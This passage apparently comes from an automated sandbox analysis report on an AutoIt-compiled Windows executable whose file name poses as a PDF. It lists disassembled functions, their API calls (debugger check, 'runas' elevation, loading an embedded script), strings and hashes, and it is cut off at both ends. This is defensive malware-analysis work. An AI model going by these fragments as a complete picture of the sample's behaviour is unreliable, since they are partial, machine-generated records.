36b85e-36b85f 692->698 693->694 701 36b83a-36b83c 693->701 694->692 702 36b67e-36b693 695->702 704 36b856-36b85c 696->704 705 36b7f3-36b7f5 696->705 706 36b57e-36b595 697->706 698->648 707 36b191-36b193 699->707 708 36b199-36b1bc GetConsoleCP 699->708 709 36b4a5-36b4be 700->709 710 36b4e9-36b520 WriteFile 700->710 701->698 712 36b699-36b69b 702->712 704->698 705->691 714 36b7f7-36b7fc 705->714 715 36b59b-36b59e 706->715 707->674 707->708 716 36b1c2-36b1ca 708->716 717 36b440-36b446 708->717 718 36b4c0-36b4ca 709->718 719 36b4cb-36b4e7 709->719 710->681 711 36b526-36b538 710->711 711->696 720 36b53e-36b54f 711->720 721 36b69d-36b6b3 712->721 722 36b6d8-36b719 WideCharToMultiByte 712->722 724 36b812-36b819 call 367bed 714->724 725 36b7fe-36b810 call 367c0e call 367bda 714->725 726 36b5a0-36b5b6 715->726 727 36b5de-36b627 WriteFile 715->727 728 36b1d4-36b1d6 716->728 717->705 718->719 719->700 719->710 720->690 729 36b555 720->729 730 36b6c7-36b6d6 721->730 731 36b6b5-36b6c4 721->731 722->681 733 36b71f-36b721 722->733 724->692 725->692 735 36b5cd-36b5dc 726->735 736 36b5b8-36b5ca 726->736 727->681 738 36b62d-36b645 727->738 739 36b1dc-36b1fe 728->739 740 36b36b-36b36e 728->740 729->696 730->712 730->722 731->730 745 36b727-36b75a WriteFile 733->745 735->715 735->727 736->735 738->696 748 36b64b-36b658 738->748 741 36b217-36b223 call 361688 739->741 742 36b200-36b215 739->742 743 36b375-36b3a2 740->743 744 36b370-36b373 740->744 763 36b225-36b239 741->763 764 36b269-36b26b 741->764 749 36b271-36b283 call 3740f7 742->749 751 36b3a8-36b3ab 743->751 744->743 744->751 752 36b75c-36b776 745->752 753 36b77a-36b78e GetLastError 745->753 748->706 755 36b65e 748->755 773 36b435-36b43b 749->773 774 36b289 749->774 757 36b3b2-36b3c5 call 375884 751->757 758 36b3ad-36b3b0 751->758 752->745 760 36b778 752->760 762 36b794-36b796 753->762 755->696 757->681 777 36b3cb-36b3d5 757->777 758->757 765 36b407-36b40a 758->765 760->762 762->686 768 36b798-36b7b0 762->768 770 36b412-36b42d 763->770 771 36b23f-36b254 call 3740f7 763->771 764->749 765->728 769 36b410 765->769 768->702 775 36b7b6 768->775 769->773 770->773 771->773 784 36b25a-36b267 771->784 773->686 778 36b28f-36b2c4 WideCharToMultiByte 774->778 775->696 780 36b3d7-36b3ee call 375884 777->780 781 36b3fb-36b401 777->781 778->773 782 36b2ca-36b2f0 WriteFile 778->782 780->681 788 36b3f4-36b3f5 780->788 781->765 782->681 783 36b2f6-36b30e 782->783 783->773 787 36b314-36b31b 783->787 784->778 787->781 789 36b321-36b34c WriteFile 787->789 788->781 789->681 790 36b352-36b359 789->790 790->773 791 36b35f-36b366 790->791 791->781
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                                    • Instruction ID: 7058acf73c370e7cb4c884c53df2a085a6a8dd4002b07d1ba3299e69b5699435
                                                    • Opcode Fuzzy Hash: 8e52ea1aa68eb90e45f6a120975d330f3c4b46abaf46f4480efc5f93239478fd
                                                    • Instruction Fuzzy Hash: 63324D75A022688FCB268F15DC41AE9B7B5FF46310F5980D9E40AE7A89D7309EC1CF52
                                                    Function 00343D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                                      • Part of subcall function 00346430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343DEE,00401148,?,?,?,?,?,00343AA3,?), ref: 00346471
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F28F4,00000010), ref: 003B1CCE
                                                    • SetCurrentDirectoryW.KERNEL32(?,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D06
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003DDAB4,00401148,?,?,?,?,?,00343AA3,?), ref: 003B1D89
                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00343AA3), ref: 003B1D90
                                                      • Part of subcall function 00343E6E: GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                                      • Part of subcall function 00343E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                                      • Part of subcall function 00343E6E: LoadIconW.USER32(00000063), ref: 00343E9E
                                                      • Part of subcall function 00343E6E: LoadIconW.USER32(000000A4), ref: 00343EB0
                                                      • Part of subcall function 00343E6E: LoadIconW.USER32(000000A2), ref: 00343EC2
                                                      • Part of subcall function 00343E6E: RegisterClassExW.USER32(?), ref: 00343F30
                                                      • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                                      • Part of subcall function 003436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                                      • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                                      • Part of subcall function 003436B8: ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                                      • Part of subcall function 00344FFC: _memset.LIBCMT ref: 00345022
                                                      • Part of subcall function 00344FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003450CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                    • String ID: ()?$This is a third-party compiled AutoIt script.$runas
                                                    • API String ID: 438480954-42928549
                                                    • Opcode ID: 4cfb9040dea44fed68998dc012de7982a4cdaaeaf8c50d4be9533d721bb4d8aa
                                                    • Instruction ID: 13565b8e901344168d4240a5c36d0658e42d12ecdd50616a7a94616abd09a188
                                                    • Opcode Fuzzy Hash: 4cfb9040dea44fed68998dc012de7982a4cdaaeaf8c50d4be9533d721bb4d8aa
                                                    • Instruction Fuzzy Hash: AF510731E05248ABCF17ABB0DD46EEE7BB99B19704F004079F641BF1A2DB746645CB21
                                                    Function 0035DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1021 35ddc0-35de4f call 34d7f7 GetVersionExW call 346a63 call 35dfb4 call 346571 1030 35de55-35de56 1021->1030 1031 3b24c8-3b24cb 1021->1031 1034 35de92-35dea2 call 35df77 1030->1034 1035 35de58-35de63 1030->1035 1032 3b24cd 1031->1032 1033 3b24e4-3b24e8 1031->1033 1037 3b24d0 1032->1037 1038 3b24ea-3b24f3 1033->1038 1039 3b24d3-3b24dc 1033->1039 1050 35dea4-35dec1 GetCurrentProcess call 35df5f 1034->1050 1051 35dec7-35dee1 1034->1051 1040 3b244e-3b2454 1035->1040 1041 35de69-35de6b 1035->1041 1037->1039 1038->1037 1045 3b24f5-3b24f8 1038->1045 1039->1033 1043 3b245e-3b2464 1040->1043 1044 3b2456-3b2459 1040->1044 1046 3b2469-3b2475 1041->1046 1047 35de71-35de74 1041->1047 1043->1034 1044->1034 1045->1039 1052 3b247f-3b2485 1046->1052 1053 3b2477-3b247a 1046->1053 1048 3b2495-3b2498 1047->1048 1049 35de7a-35de89 1047->1049 1048->1034 1054 3b249e-3b24b3 1048->1054 1055 3b248a-3b2490 1049->1055 1056 35de8f 1049->1056 1050->1051 1073 35dec3 1050->1073 1058 35df31-35df3b GetSystemInfo 1051->1058 1059 35dee3-35def7 call 35e00c 1051->1059 1052->1034 1053->1034 1060 3b24bd-3b24c3 1054->1060 1061 3b24b5-3b24b8 1054->1061 1055->1034 1056->1034 1063 35df0e-35df1a 1058->1063 1069 35df29-35df2f GetSystemInfo 1059->1069 1070 35def9-35df01 call 35dff4 GetNativeSystemInfo 1059->1070 1060->1034 1061->1034 1065 35df21-35df26 1063->1065 1066 35df1c-35df1f FreeLibrary 1063->1066 1066->1065 1072 35df03-35df07 1069->1072 1070->1072 1072->1063 1075 35df09-35df0c FreeLibrary 1072->1075 1073->1051 1075->1063
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 0035DDEC
                                                    • GetCurrentProcess.KERNEL32(00000000,003DDC38,?,?), ref: 0035DEAC
                                                    • GetNativeSystemInfo.KERNELBASE(?,003DDC38,?,?), ref: 0035DF01
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF0C
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035DF1F
                                                    • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF29
                                                    • GetSystemInfo.KERNEL32(?,003DDC38,?,?), ref: 0035DF35
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                    • String ID:
                                                    • API String ID: 3851250370-0
                                                    • Opcode ID: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                                    • Instruction ID: f2624dbde9988210c1dd79d7016d1dac2557d89ea481b78f351486bebbf2be66
                                                    • Opcode Fuzzy Hash: ed6fbfbd8654564cf8da3eaf73ba653c54fa7b0de363f5cbdcdcafd465e0659a
                                                    • Instruction Fuzzy Hash: 6B61A0B180A284CFCF27CF6898C19EA7FB46F29305B1A49D9DC859F217C624C90DCB65
                                                    Function 0034406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1123 34406b-344083 CreateStreamOnHGlobal 1124 344085-34409c FindResourceExW 1123->1124 1125 3440a3-3440a6 1123->1125 1126 3440a2 1124->1126 1127 3b4f16-3b4f25 LoadResource 1124->1127 1126->1125 1127->1126 1128 3b4f2b-3b4f39 SizeofResource 1127->1128 1128->1126 1129 3b4f3f-3b4f4a LockResource 1128->1129 1129->1126 1130 3b4f50-3b4f6e 1129->1130 1130->1126
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0034449E,?,?,00000000,00000001), ref: 0034407B
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0034449E,?,?,00000000,00000001), ref: 00344092
                                                    • LoadResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F1A
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB), ref: 003B4F2F
                                                    • LockResource.KERNEL32(0034449E,?,?,0034449E,?,?,00000000,00000001,?,?,?,?,?,?,003441FB,00000000), ref: 003B4F42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                                    • Instruction ID: 724adccd68be27bebed513be57a35fd7f9b41c26b0e95862bd61b4e3ff49b0b7
                                                    • Opcode Fuzzy Hash: c96f3d149815d1a324307c6233897d83f3ff07120dca6bae9500d8d160c53dde
                                                    • Instruction Fuzzy Hash: B3112A71200705AFE7228B65EC49F67BBBDEBC5B51F10457CF602DA6A0DA71EC048B20
                                                    Function 00386CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,003B2F49), ref: 00386CB9
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00386CCA
                                                    • FindClose.KERNEL32(00000000), ref: 00386CDA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                                    • Instruction ID: aafa502b2109a5d59645119d7fdf880d607e86928ce1af0a3f3e277ca399108c
                                                    • Opcode Fuzzy Hash: d4a519f614bc8e0ddaa1678bed05cf9fbd88dbb23ec094bd703638a3634967ac
                                                    • Instruction Fuzzy Hash: EAE048318145155B86517738EC0E8E9777CDA05339F144765F575C11D0E770E94447D5
                                                    Function 00353200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: @
                                                    • API String ID: 3964851224-124383662
                                                    • Opcode ID: fe58fc7fb7d8aef3e92210c8fdc38538f3fe6eeb05234591f73151781e50aa3d
                                                    • Instruction ID: 559e33b1706b99c9592b70b5e1a2d8a328ce2dfc568b5e0e849286706b22eda1
                                                    • Opcode Fuzzy Hash: fe58fc7fb7d8aef3e92210c8fdc38538f3fe6eeb05234591f73151781e50aa3d
                                                    • Instruction Fuzzy Hash: 8F929B706083418FD726DF18C480F6AB7E5BF88348F15885DE98A8B762D771ED49CB92
                                                    Function 0034E3E3 Relevance: .5, Instructions: 521COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9f759f50ae367f297d018cdb103424440ec70d714f00c943d9bfe628b77e26c1
                                                    • Instruction ID: 48593709e9577025b9d62eea83fb14d3c8e1b6b014ab300aca58f044904e782b
                                                    • Opcode Fuzzy Hash: 9f759f50ae367f297d018cdb103424440ec70d714f00c943d9bfe628b77e26c1
                                                    • Instruction Fuzzy Hash: 5312BD70904206CFDB26DF58C480AAAB7F0FF58314F168069E98AAF751E735BD85CB91
                                                    Function 0034E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                                    • timeGetTime.WINMM ref: 0034EBFA
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034ED2E
                                                    • TranslateMessage.USER32(?), ref: 0034ED3F
                                                    • DispatchMessageW.USER32(?), ref: 0034ED4A
                                                    • LockWindowUpdate.USER32(00000000), ref: 0034ED79
                                                    • DestroyWindow.USER32 ref: 0034ED85
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0034ED9F
                                                    • Sleep.KERNEL32(0000000A), ref: 003B5270
                                                    • TranslateMessage.USER32(?), ref: 003B59F7
                                                    • DispatchMessageW.USER32(?), ref: 003B5A05
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003B5A19
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                    • API String ID: 2641332412-570651680
                                                    • Opcode ID: 7af87ef4a02a9183dff7b5da4a974387516003a83e87206b4df6d77789e2f5f3
                                                    • Instruction ID: beb1ec2c9451e47394b9d442a189793fba7a4734bbac49387f4290ca8c2b38c8
                                                    • Opcode Fuzzy Hash: 7af87ef4a02a9183dff7b5da4a974387516003a83e87206b4df6d77789e2f5f3
                                                    • Instruction Fuzzy Hash: 8D62B070508340DFDB26DF24C885BAA77E8BF45304F04497DFA869F6A2DB75A848CB52
                                                    Function 00375C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___createFile.LIBCMT ref: 00375EC3
                                                    • ___createFile.LIBCMT ref: 00375F04
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F2D
                                                    • __dosmaperr.LIBCMT ref: 00375F34
                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F47
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00375F6A
                                                    • __dosmaperr.LIBCMT ref: 00375F73
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00375F7C
                                                    • __set_osfhnd.LIBCMT ref: 00375FAC
                                                    • __lseeki64_nolock.LIBCMT ref: 00376016
                                                    • __close_nolock.LIBCMT ref: 0037603C
                                                    • __chsize_nolock.LIBCMT ref: 0037606C
                                                    • __lseeki64_nolock.LIBCMT ref: 0037607E
                                                    • __lseeki64_nolock.LIBCMT ref: 00376176
                                                    • __lseeki64_nolock.LIBCMT ref: 0037618B
                                                    • __close_nolock.LIBCMT ref: 003761EB
                                                      • Part of subcall function 0036EA9C: CloseHandle.KERNELBASE(00000000,003EEEF4,00000000,?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAEC
                                                      • Part of subcall function 0036EA9C: GetLastError.KERNEL32(?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAF6
                                                      • Part of subcall function 0036EA9C: __free_osfhnd.LIBCMT ref: 0036EB03
                                                      • Part of subcall function 0036EA9C: __dosmaperr.LIBCMT ref: 0036EB25
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __lseeki64_nolock.LIBCMT ref: 0037620D
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00376342
                                                    • ___createFile.LIBCMT ref: 00376361
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037636E
                                                    • __dosmaperr.LIBCMT ref: 00376375
                                                    • __free_osfhnd.LIBCMT ref: 00376395
                                                    • __invoke_watson.LIBCMT ref: 003763C3
                                                    • __wsopen_helper.LIBCMT ref: 003763DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                    • String ID: @
                                                    • API String ID: 3896587723-2766056989
                                                    • Opcode ID: 3b92727374424b3b8986f0c008f4357861f3ffcbd89b114392e158f8694133b4
                                                    • Instruction ID: 83fb7e285a1d91a72dae130cf0d9d13f7ebb1b6d9a090252230ef11ab5754a0c
                                                    • Opcode Fuzzy Hash: 3b92727374424b3b8986f0c008f4357861f3ffcbd89b114392e158f8694133b4
                                                    • Instruction Fuzzy Hash: 6D224771904A059FEB3B9F68CC56BBD7B61EB14314F25C228E519AB2D2C37D8D40CB91
                                                    Function 0038FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • _wcscpy.LIBCMT ref: 0038FA96
                                                    • _wcschr.LIBCMT ref: 0038FAA4
                                                    • _wcscpy.LIBCMT ref: 0038FABB
                                                    • _wcscat.LIBCMT ref: 0038FACA
                                                    • _wcscat.LIBCMT ref: 0038FAE8
                                                    • _wcscpy.LIBCMT ref: 0038FB09
                                                    • __wsplitpath.LIBCMT ref: 0038FBE6
                                                    • _wcscpy.LIBCMT ref: 0038FC0B
                                                    • _wcscpy.LIBCMT ref: 0038FC1D
                                                    • _wcscpy.LIBCMT ref: 0038FC32
                                                    • _wcscat.LIBCMT ref: 0038FC47
                                                    • _wcscat.LIBCMT ref: 0038FC59
                                                    • _wcscat.LIBCMT ref: 0038FC6E
                                                      • Part of subcall function 0038BFA4: _wcscmp.LIBCMT ref: 0038C03E
                                                      • Part of subcall function 0038BFA4: __wsplitpath.LIBCMT ref: 0038C083
                                                      • Part of subcall function 0038BFA4: _wcscpy.LIBCMT ref: 0038C096
                                                      • Part of subcall function 0038BFA4: _wcscat.LIBCMT ref: 0038C0A9
                                                      • Part of subcall function 0038BFA4: __wsplitpath.LIBCMT ref: 0038C0CE
                                                      • Part of subcall function 0038BFA4: _wcscat.LIBCMT ref: 0038C0E4
                                                      • Part of subcall function 0038BFA4: _wcscat.LIBCMT ref: 0038C0F7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                    • String ID: >>>AUTOIT SCRIPT<<<$t2?
                                                    • API String ID: 2955681530-974027732
                                                    • Opcode ID: b0a86bd436ace2bc6b193fb894fd900bbb0b5345dcd9614b4419115b80f4537f
                                                    • Instruction ID: 55d67776def699c0a22383e2e804d5353591e9c44dd1a5b80547727af75c62b7
                                                    • Opcode Fuzzy Hash: b0a86bd436ace2bc6b193fb894fd900bbb0b5345dcd9614b4419115b80f4537f
